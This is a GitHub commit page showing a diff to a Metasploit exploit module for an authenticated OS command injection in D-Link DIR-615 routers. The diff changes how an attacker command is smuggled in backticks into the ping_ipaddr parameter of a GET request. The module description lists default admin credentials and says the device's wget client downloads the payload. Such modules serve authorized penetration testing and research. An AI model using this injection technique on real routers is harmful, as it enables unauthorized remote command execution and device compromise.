Skip to content

Commit 4816925

Browse files
author
m-1-k-3
committed
feeback included
1 parent 981cc89 commit 4816925

File tree

1 file changed

+3
-4
lines changed

1 file changed

+3
-4
lines changed

modules/exploits/linux/http/dlink_dir615_up_exec.rb

Lines changed: 3 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -22,7 +22,8 @@ def initialize(info = {})
2222
Some D-Link Routers are vulnerable to an authenticated OS command injection.
2323
Default credentials for the web interface are admin/admin or admin/password. Since
2424
it is a blind os command injection vulnerability, there is no output for the
25-
executed command when using the cmd generic payload. A ping command against a
25+
executed command when using the cmd generic payload. This module was tested against
26+
a DIR-615 hardware revision H1 - firmware version 8.04. A ping command against a
2627
controlled system could be used for testing purposes. The exploit uses the wget
2728
client from the device to download the payload.
2829
},
@@ -77,17 +78,15 @@ def initialize(info = {})
7778

7879
def request(cmd,user,pass)
7980
#http://IP/tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr=1.1.1.1%60COMMAND%60&ping6_ipaddr=
80-
cmd = Rex::Text.uri_encode(cmd)
8181

8282
begin
8383
res = send_request_cgi({
8484
'uri' => @uri,
8585
'method' => 'GET',
86-
'encode_params' => false,
8786
'vars_get' => {
8887
"page" => "tools_vct",
8988
"hping" => "0",
90-
"ping_ipaddr" => "1.1.1.1%60#{cmd}%60",
89+
"ping_ipaddr" => "1.1.1.1`#{cmd}`",
9190
"ping6_ipaddr" => ""
9291
}
9392
})

0 commit comments

Comments
 (0)